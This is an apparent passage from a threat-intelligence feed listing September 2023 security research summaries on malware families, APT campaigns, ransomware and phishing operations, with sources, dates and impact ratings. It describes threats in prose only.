- Date of Scan:
- 2023-09-23
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have studied the Turla cyberespionage gang’s efforts throughout the years, paying particular attention to the key MITRE techniques and the accompanying IDs connected to the threat actor group.
Source:
https://www.trendmicro.com/en_us/research/23/i/examining-the-activities-of-the-turla-group.html
—
- Intel Source:
- SentinelOne
- Intel Name:
- Targeting_Telcos_with_a_LuaJIT_Toolkit
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- A series of cyberattacks against telecommunications providers in the Middle East, Western Europe, and the South Asian subcontinent have been linked to a hitherto unknown threat actor known as Sandman. It is noteworthy that the incursions use the just-in-time (JIT) LuaJIT compiler to deliver the unique LuaDream implant.
Source:
https://www.sentinelone.com/labs/sandman-apt-a-mystery-group-targeting-telcos-with-a-luajit-toolkit/
—
- Intel Source:
- Checkpoint
- Intel Name:
- The_Evil_Alliance_Between_GuLoader_And_Remcos
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- Remcos and GuLoader have a close relationship, according to Checkpoint researchers. Remcos is hard to employ for nefarious reasons because antivirus programs may quickly detect it. However, Remcos can get around antivirus defense by using GuLoader. During this investigation, they found that GuLoader is now marketed as a crypter that renders its payload completely immune to antivirus software on the same platform as Remcos and is implicitly sold under a different name.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Iranian_Nation_State_Actor_OilRig_Attacks_Israeli_Organizations
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- As part of two distinct campaigns planned by the Iranian nation-state actor known as OilRig in 2021 and 2022, Israeli organizations have been identified by ESET researchers as being targeted. Two previously known first-stage backdoors called Solar and Mango were used in the attacks, dubbed Outer Space and Juicy Mix, to gather sensitive data from popular browsers and the Windows Credential Manager.
—
- Intel Source:
- Checkpoint
- Intel Name:
- A_Banker_Server_Side_Components_Analysis
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- A recent campaign utilizing a new form of the BBTok banker and operating in Latin America was recently uncovered by Check Point researchers. In the study, Check Point researchers focus on recently identified infection chains that employ a special mix of Living off the Land Binaries (LOLBins).
—
- Intel Source:
- Cyble
- Intel Name:
- Drinik_Malware_Returns_to_Threaten_Indian_Taxpayers
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- Researchers from Cyble have noticed that the Drinik malware showed increased activity levels that were timed to coincide with the deadline for filing Indian income tax returns. Drinik malware’s most recent version includes a number of recently introduced features.
Source:
https://cyble.com/blog/indian-taxpayers-face-a-multifaceted-threat-with-drinik-malwares-return/
—
- Intel Source:
- McAfee
- Intel Name:
- Investigation_into_WinRAR_Vulnerability
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- McAfee researchers examined a sample that exploited the major RCE vulnerability CVE-2023-38831. It has to do with an RCE flaw in WinRAR prior to version 6.23. The problem arises because a ZIP archive could contain a harmless file (such as a regular .JPG file) as well as a folder with the same name as the innocent file, and when you try to access just the harmless file, the contents of the folder (which might have executable content) are processed.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/exploring-winrar-vulnerability-cve-2023-38831/
—
- Intel Source:
- Bitsight
- Intel Name:
- Analysis_of_SmokeLoaders_Plugins
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- A well-known malware family with a history spanning more than ten years is called SmokeLoader. The primary function of this malware is to download and drop additional malware families. However, the owners of SmokeLoader also market plugins that give the primary module new features. These plugins give an affiliate the ability to gather a variety of information from compromised PCs, including emails, cookies, passwords, and browser data.
—
- Intel Source:
- Sonatype
- Intel Name:
- An_ongoing_campaign_on_the_npm_registry
- Date of Scan:
- 2023-09-22
- Impact:
- LOW
- Summary:
- The Sonatype research team tracked down a campaign on the npm registry that uses npm packages to retrieve and exfiltrate the victim’s Kubernetes configuration and SSH keys to an external server.
Source:
https://blog.sonatype.com/npm-packages-caught-exfiltrating-kubernetes-config-ssh-keys
—
- Intel Source:
- Secureworks
- Intel Name:
- Gold_Melody_Group_Selling_Compromised_Access_to_Ransomware_Attackers
- Date of Scan:
- 2023-09-21
- Impact:
- LOW
- Summary:
- Researchers at Secureworks have discovered that a financially motivated threat actor has been exposed as an initial access broker (IAB) who buys access to compromised businesses from other adversaries in order to launch follow-up attacks like ransomware. The e-crime group is tracked as Gold Melody, also known as Prophet Spider (CrowdStrike) and UNC961 (Mandiant).
Source:
https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker
—
- Intel Source:
- Cado Security
- Intel Name:
- P2Pinfect_Botnet_Targeting_Redis_and_SSH_Services
- Date of Scan:
- 2023-09-21
- Impact:
- LOW
- Summary:
- According to Cado Security researchers, P2Pinfect compromises have been seen in China, the United States, Germany, the UK, Singapore, Hong Kong, and Japan. Since August 28, a new peer-to-peer botnet named P2Pinfect that targets the open-source Redis and SSH services has apparently seen a remarkable 600-times rise in traffic, including a 12.3% increase over the previous week.
—
- Intel Source:
- ASEC
- Intel Name:
- Attack_on_MS_SQL_Servers_by_HiddenGh0st_Malware
- Date of Scan:
- 2023-09-21
- Impact:
- LOW
- Summary:
- Recently, ASEC researchers verified the spread of a Gh0st RAT variant that targets poorly managed MS-SQL servers and installs the Hidden rootkit. An open-source rootkit called Hidden, which is available to everyone on GitHub, has the capacity to protect processes and hide files, registry entries, and even itself.
—
- Intel Source:
- SOC Radar
- Intel Name:
- An_Overview_of_NoEscape_Ransomware
- Date of Scan:
- 2023-09-21
- Impact:
- MEDIUM
- Summary:
- As a Ransomware-as-a-Service (RaaS), NoEscape Ransomware first appeared in May 2023. At this time, NoEscape RaaS operators provide affiliates a complete platform that makes it simple to create and administer payloads specifically designed for both Windows and Linux operating systems. NoEscape is also known for its multi-extortion techniques, and it keeps a blog on the Tor network where it lists its victims openly and shows the data that has been exfiltrated from people who refuse to comply with their demands.
Source:
https://socradar.io/dark-web-profile-noescape-ransomware/
—
- Intel Source:
- CISA
- Intel Name:
- Advisory_on_Snatch_Ransomware
- Date of Scan:
- 2023-09-21
- Impact:
- MEDIUM
- Summary:
- The FBI and CISA released a joint Cybersecurity Advisory about Snatch Ransomware which shared IOCs, tactics, techniques, and procedures linked with the Snatch ransomware variant. Snatch threat actors operate under a ransomware-as-a-service (RaaS) model and change their tactics according to current cybercriminal trends and the successes of other ransomware operations.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Fake_WinRAR_PoC_Exploit_Drops_VenomRAT
- Date of Scan:
- 2023-09-21
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have discovered a hacker attempting to infect downloaders with the VenomRAT malware by disseminating a phony proof-of-concept (PoC) exploit for a newly patched WinRAR vulnerability on GitHub.
Source:
https://unit42.paloaltonetworks.com/fake-cve-2023-40477-poc-hides-venomrat/
—
- Intel Source:
- Blackberry
- Intel Name:
- Silent_Skimmer_Targeting_APAC_and_NALA_Regions
- Date of Scan:
- 2023-09-20
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry have uncovered a brand-new campaign they’ve called “Silent Skimmer,” in which a financially motivated threat actor preys on weak online payment companies in the APAC and NALA areas. Utilizing flaws, the attacker compromises web servers and gains first access. The final payload uses payment scraping tools to collect consumers’ sensitive financial information from hacked websites.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Chinese_Malware_Emerges_Widely
- Date of Scan:
- 2023-09-20
- Impact:
- LOW
- Summary:
- Researchers at Proofpoint have noticed an uptick in activity from particular malware families that target speakers of Chinese. When it comes to cybercrime with a Chinese theme, the recently discovered malware ValleyRAT is emerging, while Sainbox RAT and its related variants have also recently become active.
—
- Intel Source:
- Cert.Pl
- Intel Name:
- DotRunPeX_analysis
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- The Polish national CERT observed a new malspam campaign targeting Polish users. It all started with a phishing email; the initial email was sent from a legitimate employee account of a Polish company (using stolen credentials), and a Polish C2 server was also used.
Source:
https://cert.pl/en/posts/2023/09/unpacking-whats-packed-dotrunpex/
—
- Intel Source:
- Sophos
- Intel Name:
- Liquidity_mining_scam_activity
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Sophos has observed that one liquidity mining scam variant has been growing at a rapid pace – fake. Sophos X-Ops has also seen growth in crypto phishing sites that connect to cryptocurrency wallets while impersonating cryptotrading-related brands in other types of scams, but these sites are often used by sha zhu pan scammers to separate victims from their money.
—
- Intel Source:
- Cyble
- Intel Name:
- Cobalt_Strike_Beacon_delivery
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Cyble researchers observed a typosquatted domain of Sophos. That phishing site contains a malware payload embedded within its source code. When a user visits this site, the malware is automatically downloaded to the victim’s machine without requiring any user interaction.
Source:
https://cyble.com/blog/covert-delivery-of-cobalt-strike-beacon-via-sophos-phishing-website/
—
- Intel Source:
- CyberCX
- Intel Name:
- The_multiple_investigation_to_the_Akira_ransomware_group
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- The CyberCX researchers assisted with multiple investigations linked to the Akira ransomware group, which was active over the last couple of months. They observed a technique that involves deploying ransomware onto Windows Hyper-V hypervisor systems, causing major damage to attached virtual machines (VMs).
—
- Intel Source:
- CISA
- Intel Name:
- Five_malware_samples_backdoors_analysis
- Date of Scan:
- 2023-09-19
- Impact:
- MEDIUM
- Summary:
- CISA obtained five malware samples – related to SUBMARINE, SKIPJACK, SEASPRAY, WHIRLPOOL, and SALTWATER backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).
Source:
https://www.cisa.gov/news-events/analysis-reports/ar23-250a-0
—
- Intel Source:
- Cyfirma
- Intel Name:
- RedLine_stealer_new_variant
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- A Cyfirma investigation revealed a new strain of malware that is being distributed under the guise of fake documents or software. It uses multi-level obfuscation to avoid detection and uses an obfuscated PowerShell script as a dropper to execute the malware.
—
- Intel Source:
- Sysdig
- Intel Name:
- A_new_cloud_native_cryptojacking_operation_AMBERSQUID
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- The Sysdig Threat Research Team has uncovered a novel cloud-native cryptojacking operation called AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker.
—
- Intel Source:
- Cyble
- Intel Name:
- The_usage_of_an_open_source_PySilon_RAT_by_multiple_threat_actors
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Cyble researchers have observed the usage of an open-source PySilon RAT by multiple threat actors. The current version is using advanced malware capabilities, including its ability to record keystrokes, steal sensitive information, capture screen activity, execute remote commands, and perform additional functions.
Source:
https://cyble.com/blog/emerging-threat-understanding-the-pysilon-discord-rats-versatile-features/
—
- Intel Source:
- Talos
- Intel Name:
- New_HTTPSnoop_malware_targets_telecom_providers
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- Cisco Talos just discovered a new malware family “HTTPSnoop” being targeted against telecommunications providers in the Middle East. HTTPSnoop is a simple but very effective backdoor that consists of new techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.
Source:
https://blog.talosintelligence.com/introducing-shrouded-snooper/
—
- Intel Source:
- Esentire
- Intel Name:
- LockBit_Gang_Attacks_an_MSP_and_Two_Manufacturers
- Date of Scan:
- 2023-09-19
- Impact:
- MEDIUM
- Summary:
- eSentire, one of the top MDR security service providers, caught and shut down three separate ransomware attacks launched by the LockBit Ransomware Gang. LockBit is one of the most destructive ransomware groups currently operating worldwide. The companies targeted include a storage materials manufacturer, a manufacturer of home décor, and a Managed Service Provider.
—
- Intel Source:
- Cofense
- Intel Name:
- LokiBot_information_stealer
- Date of Scan:
- 2023-09-19
- Impact:
- LOW
- Summary:
- LokiBot is an Information Stealer with expanding capabilities depending on the threat actor. This malware family was originally written in C++ and targets Windows devices. LokiBot has remained in the top five malware families delivered through phishing emails.
Source:
https://cofense2022stg.wpengine.com/blog/lokibot-phishing-malware-baseline/
—
- Intel Source:
- Intel471
- Intel Name:
- Return_of_Bumblebee_Loader_in_New_Campaign
- Date of Scan:
- 2023-09-18
- Impact:
- LOW
- Summary:
- Intel471 researchers have discovered a fresh campaign that uses WebDAV (Web Distributed Authoring and Versioning) servers to spread Bumblebee payloads. Threat actors use malicious spam emails to send out Windows shortcut (.LNK) and compressed archive (.ZIP) files that contain .LNK files in this campaign. These LNK files run a preset sequence of commands designed to download Bumblebee malware stored on WebDAV servers when they are triggered by the user.
Source:
https://intel471.com/blog/bumblebee-loader-resurfaces-in-new-campaign
—
- Intel Source:
- SentinelOne
- Intel Name:
- A_recent_variant_of_the_Shlayer_malware
- Date of Scan:
- 2023-09-18
- Impact:
- LOW
- Summary:
- SentinelOne shared the details of the malware variant and how it can be decoded to reveal the telltale Shlayer signature. Shlayer is the most talked-about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory.
Source:
https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Earth_Lusca_Hackers_Using_Cobalt_Strike
- Date of Scan:
- 2023-09-18
- Impact:
- MEDIUM
- Summary:
- The Linux-based malware, which has been dubbed SprySOCKS due to its quick behavior and SOCKS implementation, has been identified by TrendMicro researchers while keeping track of Earth Lusca. It appears to have come from the open-source Windows backdoor Trochilus.
Source:
https://www.trendmicro.com/en_us/research/23/i/earth-lusca-employs-new-linux-backdoor.html
—
- Intel Source:
- PaloAlto
- Intel Name:
- 10_most_active_types_of_Turla_malware
- Date of Scan:
- 2023-09-18
- Impact:
- LOW
- Summary:
- Palo Alto researchers analyzed the top 10 most recently active types of malware in Pensive Ursa’s arsenal: Capibar, Kazuar, Snake, Kopiluwak, QUIETCANARY/Tunnus, Crutch, ComRAT, Carbon, HyperStack and TinyTurla. MITRE has described Turla as being “known for their targeted intrusions and innovative stealth.”
Source:
https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- A_new_malicious_LNK_file_activity
- Date of Scan:
- 2023-09-16
- Impact:
- LOW
- Summary:
- The Deep Instinct Threat Lab has discovered a new operation against Azerbaijani targets. The operation has at least two different initial access vectors. The operation is not associated with a known threat actor; the operation was instead named because of its novel malware written in the Rust programming language.
—
- Intel Source:
- Cyble
- Intel Name:
- Python_malware_activity_campaigns
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Cyble researchers discovered Python malware capturing screenshots and sending them over FTP to remote attackers. They also observed similar campaigns in the recent past targeting the United States and Germany, with the perpetrator tracked as “TA866”. This campaign involves the execution of PowerShell script, which is responsible for taking screenshots and uploading them to a remote FTP server.
Source:
https://cyble.com/blog/tatar-language-users-in-the-crosshairs-of-python-screenshotter/
—
- Intel Source:
- Microsoft
- Intel Name:
- Attacks_on_Defense_Organizations_by_Iranian_Hackers
- Date of Scan:
- 2023-09-15
- Impact:
- MEDIUM
- Summary:
- Since February 2023, Microsoft researchers have seen that a threat group supported by Iran has been conducting password spray attacks against hundreds of businesses in the United States and around the world. Additionally, a small number of victims in the pharmaceutical, satellite, and defense industries had their sensitive data stolen by state hackers.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- BatLoader_malware_used_in_malicious_campaign
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Malwarebytes researchers saw the same malicious ad whenever they searched for Webex. A new malvertising campaign is targeting corporate users who are downloading the popular web conferencing software Webex.
—
- Intel Source:
- Security Affairs
- Intel Name:
- Free_download_manager_served_Linux_malware
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Researchers from Kaspersky observed a free download manager site that had been hacked to inject Linux malware. During their research, the experts discovered that the compromised domain had a deb.fdmpkg[.]org subdomain.
Source:
https://securityaffairs.com/150851/malware/free-download-manager-supply-chain-attack.html?amp=1
—
- Intel Source:
- Retool
- Intel Name:
- Unauthorized_access_to_Cloud_accounts
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Lately, Retool told their 27 cloud customers that there had been unauthorized access to their accounts. The attacker was able to navigate through multiple layers of security controls after taking advantage of one of Retool’s employees through an SMS-based phishing attack.
—
- Intel Source:
- Netskope
- Intel Name:
- New_Python_NodeStealer_campaign
- Date of Scan:
- 2023-09-15
- Impact:
- LOW
- Summary:
- Netskope Threat Labs is monitoring a campaign that uses malicious Python scripts to steal Facebook business users’ credentials and browser data. This campaign targets accounts with bogus Facebook messages carrying a malicious file attachment. The attacks mainly target victims in Southern Europe and North America.
—
- Intel Source:
- Sucuri
- Intel Name:
- Credit_card_theft_malware
- Date of Scan:
- 2023-09-14
- Impact:
- LOW
- Summary:
- During their cleanup of a compromised Magento ecommerce website, Sucuri analysts caught something that triggered their attention: credit card theft malware that was concealed through a single, invisible pixel. In their post, the analysts shared how the attackers were able to use a single hidden pixel as a red herring to conceal a broader infection on a checkout page, and reviewed a collection of other similar Magecart attacks.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_MidgeDropper_dropper
- Date of Scan:
- 2023-09-14
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs discovered a new dropper variant called MidgeDropper. They analyzed it, and this dropper made an interesting case study. The affected platform is Windows, and the potential impact is the deployment of additional malware for additional purposes.
Source:
https://www.fortinet.com/blog/threat-research/new-midgedropper-variant
—
- Intel Source:
- Group-IB
- Intel Name:
- W3LL_Behind_Phishing_Attack_on_Microsoft_365_Business
- Date of Scan:
- 2023-09-14
- Impact:
- LOW
- Summary:
- A custom phishing kit called W3LL Panel that is made to get around MFA and 16 other completely customized tools for business email compromise (BEC) attacks were available for purchase on the threat actor’s secret underground market, W3LL Store, which catered to a closed community of at least 500 other threat actors.
Source:
https://go.group-ib.com/hubfs/report/group-ib-w3ll-done-threat-report-2023.pdf
—
- Intel Source:
- Zscaler
- Intel Name:
- Scams_Targeting_Windows_Action_Center_Notifications
- Date of Scan:
- 2023-09-14
- Impact:
- LOW
- Summary:
- Zscaler researchers have recently noticed an increase in tech support scams, with a particular emphasis on the exploitation of Windows Action Center notifications to present consumers with false warnings. While fake Windows Defender notifications used to make up the majority of tech-support scams, scammers have since expanded their repertoire to include phony websites pretending to be those of McAfee and Avast, among other security companies.
—
- Intel Source:
- CERT-AGID
- Intel Name:
- Vidar_Malware_is_Back_to_Compromise_PEC_Mails
- Date of Scan:
- 2023-09-13
- Impact:
- LOW
- Summary:
- A new, large-scale malware campaign that targets other PEC emails and is distributed through a number of previously compromised Certified Email (PEC) accounts was discovered and stopped by CERT-AGID with the assistance of the affected PEC Managers.
Source:
https://cert-agid.gov.it/news/il-malware-vidar-torna-ad-insidiare-le-caselle-pec/
—
- Intel Source:
- TrendMicro
- Intel Name:
- RedLine_Vidar_Using_EV_Certificates_and_Switches_to_Ransomware
- Date of Scan:
- 2023-09-13
- Impact:
- MEDIUM
- Summary:
- Researchers from TrendMicro have discovered that the threat actors behind RedLine and Vidar are now disseminating ransomware payloads using the same delivery methods they employ to disseminate info stealers. By making their approaches versatile, the threat actors may be streamlining their activities. They looked into an instance where the victim had initially been exposed to information-stealing malware that had been signed using Extended Validation (EV) code signing certificates. But eventually, they began getting ransomware payloads over the same channel.
Source:
https://www.trendmicro.com/en_us/research/23/i/redline-vidar-first-abuses-ev-certificates.html
—
- Intel Source:
- Checkpoint
- Intel Name:
- Analyzing_a_Suspected_Remcos_Malware_Attack_on_Colombian_Firms
- Date of Scan:
- 2023-09-13
- Impact:
- LOW
- Summary:
- Researchers from Check Point have discovered a brand-new, extensive phishing effort that recently targeted more than 40 eminent businesses in Colombia across a variety of industries. The goal of the attackers is to covertly set up the infamous “Remcos” malware on the PCs of its victims. Remcos is an advanced “Swiss Army Knife” RAT that gives hackers complete control over the infected computer and may be used in a variety of assaults. Data theft, subsequent infections, and account takeover are common effects of a Remcos infection.
—
- Intel Source:
- Symantec
- Intel Name:
- A_Failed_LockBit_Attack_Replaced_at_3AM_Ransomware
- Date of Scan:
- 2023-09-13
- Impact:
- HIGH
- Summary:
- A new ransomware family named 3AM has appeared. According to Symantec researchers, it was used in a single attack by a ransomware affiliate that first tried to deploy LockBit on the target’s network and switched to 3AM after LockBit was blocked. 3AM is written in Rust and appears to be an entirely new family. Before encrypting files, the ransomware makes repeated attempts to stop various services on the infected machine, and after encryption completes it attempts to delete Volume Shadow Copies (VSS). Whether its developers have links to known cybercrime groups is currently unknown.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3am-ransomware-lockbit
—
- Intel Source:
- Zscaler
- Intel Name:
- A_Look_at_APT36_Modernized_Weaponry
- Date of Scan:
- 2023-09-13
- Impact:
- MEDIUM
- Summary:
- Zscaler researchers have identified new malicious activity by the Pakistan-based advanced persistent threat group APT36 that targets both Windows and Linux systems.
Source:
https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Delivering_RATs_and_Stealers_via_Updated_DBatLoader
- Date of Scan:
- 2023-09-13
- Impact:
- LOW
- Summary:
- IBM X-Force researchers have identified new features in DBatLoader samples distributed in recent email campaigns, raising the risk of infection by the common malware families delivered through DBatLoader activity. Since late June they have observed close to 20 email campaigns using the updated loader to deliver payloads including Remcos, Warzone, Formbook, and AgentTesla.
—
- Intel Source:
- Securelist
- Intel Name:
- Potential_Supply_Chain_Attack_Against_Linux_Machines
- Date of Scan:
- 2023-09-12
- Impact:
- MEDIUM
- Summary:
- Securelist researchers analyzed samples targeting Linux systems and, while investigating a group of suspicious domains, uncovered a long-running supply-chain attack delivering malware through a backdoored Free Download Manager package for Linux.
Source:
https://securelist.com/backdoored-free-download-manager-linux-malware/110465/
—
- Intel Source:
- Threatfabric
- Intel Name:
- Andromeda_latest_malware
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- ThreatFabric analysts observed a new Brazilian malware family called Andromeda, named after the URLs of the C2 servers used to establish remote-access sessions. Beyond this activity against the country’s traditional banking ecosystem, the analysts also observed increased targeting of newer financial services technologies.
Source:
https://www.threatfabric.com/blogs/andromeda-the-latest-brazilian-dto-malware-0
—
- Intel Source:
- Sentinelone
- Intel Name:
- New_MetaStealer_Malware_Targeting_macOS_Users
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- SentinelOne researchers have observed attackers using a malware family known as MetaStealer to target Mac users across a range of industries in an effort to infiltrate corporate networks. MetaStealer is typically concealed in malicious documents or files, sometimes disguised as Adobe software or Adobe files.
—
- Intel Source:
- Fortinet
- Intel Name:
- Malicious_Word_Document_Spreads_OriginBotnet
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- FortiGuard Labs researchers have discovered a sophisticated phishing campaign that uses a Microsoft Word document lure to deliver three payloads, among them Agent Tesla and OriginBotnet, in order to collect a wide range of data from infected Windows devices.
Source:
https://www.fortinet.com/blog/threat-research/originbotnet-spreads-via-malicious-word-document
—
- Intel Source:
- Cyber Threat Intelligence Network
- Intel Name:
- A_new_Evilnum_campaign
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- CTIN has observed a new campaign that is associated with earlier malicious activity linked to Evilnum. Evilnum is a threat group characterized by an evolving toolkit and sector- and geography-specific targeting. The researchers conducted an in-depth technical analysis of observations between 2018 and 2020; more recently, Cybereason has described one of the group’s newest tools, the PyVil Remote Access Trojan (RAT).
Source:
https://cyberthreatintelligencenetwork.com/index.php/2023/09/08/potential-new-evilnum-campaign/
—
- Intel Source:
- Symantec
- Intel Name:
- Espionage_Actors_target_critical_infrastructure
- Date of Scan:
- 2023-09-12
- Impact:
- LOW
- Summary:
- Researchers from Symantec have discovered evidence that a threat actor group they track as Redfly used the ShadowPad Trojan to compromise a national grid in an Asian country for as long as six months earlier this year. The attackers compromised multiple computers on the organization’s network and succeeded in stealing credentials.
Source:
https://symantec-enterprise-blogs.security.com/threat-intelligence/critical-infrastructure-attacks
—
- Intel Source:
- Symantec
- Intel Name:
- Redfly_APT_Group_Targeting_Critical_Infrastructure
- Date of Scan:
- 2023-09-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have discovered evidence that a threat actor group they track as Redfly used the ShadowPad Trojan to compromise a national grid in an Asian country for as long as six months earlier this year. The attackers compromised multiple computers on the organization’s network and succeeded in stealing credentials.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Introducing_Charming_Kitten_New_Backdoor_Sponsor
- Date of Scan:
- 2023-09-12
- Impact:
- MEDIUM
- Summary:
- ESET researchers have linked a recent wave of attacks against targets in Brazil, Israel, and the United Arab Emirates to the Iranian threat actor Charming Kitten, which ESET tracks as Ballistic Bobcat, using a previously undocumented backdoor that ESET has named Sponsor. Victimology patterns suggest that the group primarily singles out education, government, and healthcare organizations, as well as human rights activists and journalists.
—
- Intel Source:
- Security Affairs
- Intel Name:
- The_brute_force_attacks_targeting_Cisco_ASA
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- Security Affairs reports that Cisco has observed Akira ransomware threat actors targeting Cisco ASA VPNs that are not configured for multi-factor authentication in order to break into organizations, and that in the cases investigated the attackers appear to be deliberately selecting organizations that do not enforce multi-factor authentication for their VPN users.
Source:
https://securityaffairs.com/150157/cyber-crime/cisco-asa-ransomware-attacks.html
—
- Intel Source:
- Truesec
- Intel Name:
- DarkGate_Loader_Malware_Leveraging_Microsoft_Teams
- Date of Scan:
- 2023-09-11
- Impact:
- MEDIUM
- Summary:
- The Truesec Cybersecurity Team has investigated a Microsoft Teams campaign delivering the DarkGate Loader malware. On August 29, between 11:25 and 12:25 UTC, Teams chat messages were sent from two external Office 365 accounts that had been compromised before the campaign. The messages are crafted to trick recipients into downloading and running a remotely hosted malicious file.
Source:
https://www.truesec.com/hub/blog/darkgate-loader-delivered-via-teams
—
- Intel Source:
- McAfee
- Intel Name:
- Agent_Tesla_Delivering_via_VBScript
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- McAfee researchers have identified an Agent Tesla variant distributed via VBScript (VBS) files, a departure from its usual delivery techniques. VBS files are script files used on Windows to automate tasks, configure systems, and perform various operations; cybercriminals also abuse them to deliver malware and carry out harmful actions on compromised machines.
—
- Intel Source:
- Zscaler
- Intel Name:
- Technical_Investigation_of_HijackLoader
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- Zscaler researchers have observed a new malware loader, HijackLoader, gaining popularity among cybercriminals for distributing payloads such as DanaBot, SystemBC, and RedLine Stealer. Unlike most loaders, HijackLoader uses a modular architecture, so even though it lacks advanced functionality it can draw on a number of modules for code injection and execution.
Source:
https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader
—
- Intel Source:
- Securelist
- Intel Name:
- An_Analysis_of_Cuba_Ransomware
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- Securelist researchers have analyzed the Cuba ransomware. They first became aware of the group’s attacks in late 2020, when the group was not yet known as “Cuba” but was tracked as “Tropical Scorpius”. The group targets organizations in the US, Canada, and Europe and has carried out a string of high-impact attacks against financial institutions, healthcare organizations, government bodies, and the oil industry.
—
- Intel Source:
- ASEC
- Intel Name:
- Attacks_by_APT_Using_BlueShell_on_Korean_and_Thai_Targets
- Date of Scan:
- 2023-09-11
- Impact:
- LOW
- Summary:
- BlueShell is a backdoor written in Go that is available on GitHub and supports Windows, Linux, and macOS. Although the original GitHub repository appears to have been removed, other repositories still offer the BlueShell source code. Notably, the README containing the usage instructions is written in Chinese, suggesting that the author is a Chinese speaker.
—
- Intel Source:
- Checkmarx
- Intel Name:
- A_Comprehensive_Analysis_of_70_Layers_of_Info_Stealing_Malware
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- Checkmarx researchers have examined an intriguing sample wrapped in numerous layers of obfuscation. Such packages are hard to analyze, but the attackers have yet to learn that no amount of obfuscation can hide their intent.
Source:
https://checkmarx.com/blog/a-deep-dive-into-70-layers-of-obfuscated-info-stealer-malware/
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Campaign_Disguises_Emails_as_PDF_Viewer_Screens
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- AhnLab’s Security Emergency Response Center (ASEC) has uncovered a phishing campaign distributing malicious script files posing as PDF document viewer screens. The emails carry filenames related to purchase orders and receipts to lure recipients. When opened, the attachment prompts users to enter their email password to access the document, displaying different messages depending on the number of login attempts. After three tries, users are redirected to a legitimate PDF to mask the phishing attempt. The script can also exfiltrate the captured data via Telegram, which helps keep the attacker anonymous.
—
- Intel Source:
- CISA
- Intel Name:
- Multiple_APT_Groups_Exploiting_CVE_2022_47966_and_CVE_2022_42475
- Date of Scan:
- 2023-09-08
- Impact:
- MEDIUM
- Summary:
- CISA identified indicators of compromise (IOCs) dating back to January 2023 at an organization in the aerospace sector. Nation-state advanced persistent threat (APT) actors exploited CVE-2022-47966, a remote code execution vulnerability in Zoho ManageEngine ServiceDesk Plus, to access the public-facing application, establish persistence, and move laterally through the network. Other APT actors were observed gaining a foothold on the organization’s firewall device by exploiting CVE-2022-42475.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- New_Hive0117_Phishing_Campaign_Delivering_DarkWatchman_Malware
- Date of Scan:
- 2023-09-08
- Impact:
- LOW
- Summary:
- IBM X-Force researchers have identified a new phishing campaign, likely launched by Hive0117, targeting individuals working in major energy, banking, transportation, and software security organizations in Russia, Kazakhstan, Latvia, and Estonia.
—
- Intel Source:
- Google Blog
- Intel Name:
- Another_Attack_on_Security_Researchers_by_North_Korean_Hackers
- Date of Scan:
- 2023-09-08
- Impact:
- MEDIUM
